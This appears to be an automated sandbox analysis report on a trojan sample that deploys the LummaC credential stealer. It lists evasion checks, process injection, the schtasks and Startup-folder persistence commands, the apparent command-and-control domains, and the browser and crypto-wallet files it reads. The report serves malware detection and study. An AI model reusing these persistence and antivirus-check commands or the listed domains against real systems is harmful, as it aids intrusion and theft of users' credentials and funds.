Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif System information queried: FirmwareTableInformation Jump to behavior
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Window / User API: threadDelayed 2789 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif API coverage: 0.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif TID: 7552 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif TID: 7560 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Thread sleep count: Count: 2789 delay: -10 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00406739 FindFirstFileW,FindClose, 0_2_00406739
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00402902 FindFirstFileW, 0_2_00402902
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405AED
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 18_2_004DE472
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA087
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA1E2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 18_2_004EA570
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AC622 FindFirstFileExW, 18_2_004AC622
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E66DC FindFirstFileW,FindNextFileW,FindClose, 18_2_004E66DC
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E7333 FindFirstFileW,FindClose, 18_2_004E7333
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 18_2_004E73D4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DD921
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DDC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 26_2_0045E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 26_2_0046A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042C622 FindFirstFileExW, 26_2_0042C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004666DC FindFirstFileW,FindNextFileW,FindClose, 26_2_004666DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00467333 FindFirstFileW,FindClose, 26_2_00467333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 26_2_004673D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045D921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045DC54
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00475FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 18_2_00475FC8
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: Buffer.pif, 0000001A.00000002.2160485981.0000000001738000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160598329.0000000001771000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160598329.0000000001771000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163B430 LdrInitializeThunk, 26_2_0163B430
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EF4FF BlockInput, 18_2_004EF4FF
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0047338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 18_2_0047338B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00475FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 18_2_00475FC8
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00495058 mov eax, dword ptr fs:[00000030h] 18_2_00495058
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00415058 mov eax, dword ptr fs:[00000030h] 26_2_00415058
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 18_2_004D20AA
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004A2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_004A2992
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00490BAF
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490D45 SetUnhandledExceptionFilter, 18_2_00490D45
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00490F91
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00422992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00422992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00410BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410D45 SetUnhandledExceptionFilter, 26_2_00410D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00410F91

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif base: 1600000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif base: 230000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: Buffer.pif String found in binary or memory: acceptabledcooeprs.shop
Source: Buffer.pif String found in binary or memory: zippyfinickysofwps.shop
Source: Buffer.pif String found in binary or memory: obsceneclassyjuwks.shop
Source: Buffer.pif String found in binary or memory: boredimperissvieos.shop
Source: Buffer.pif String found in binary or memory: plaintediousidowsko.shop
Source: Buffer.pif String found in binary or memory: miniaturefinerninewjs.shop
Source: Buffer.pif String found in binary or memory: holicisticscrarws.shop
Source: Buffer.pif String found in binary or memory: sweetsquarediaslw.shop
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 18_2_004D1B4D
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0047338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 18_2_0047338B
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DBBED SendInput,keybd_event, 18_2_004DBBED
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DEC6C mouse_event, 18_2_004DEC6C
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MasBathroomsCompoundInjection" Participants Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Terminal + Involve + Experiencing + Borders + Deborah + Flip 1181\Y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1181\Buffer.pif 1181\Y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\eduspark.url" & echo url="c:\users\user\appdata\local\edtech spark solutions\eduspark.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\eduspark.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\eduspark.url" & echo url="c:\users\user\appdata\local\edtech spark solutions\eduspark.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\eduspark.url" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 18_2_004D14AE
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 18_2_004D1FB0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1601599009.0000000002923000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004669000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000000.1641557735.00000000004B3000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: EduSpark.pif, Buffer.pif Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490A08 cpuid 18_2_00490A08
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004CE5F4 GetLocalTime, 18_2_004CE5F4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004CE652 GetUserNameW, 18_2_004CE652
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004ABCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 18_2_004ABCD2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040348F
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Buffer.pif, 0000001A.00000003.2132311001.00000000017ED000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2132514901.00000000017F0000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159513394.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160675221.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2132311001.00000000017BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: Buffer.pif PID: 2004, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "ez": "Jaxx Liberty"
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "ez": "ExodusWeb3"
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Ethereum",
Source: Buffer.pif, 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "keystore"
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
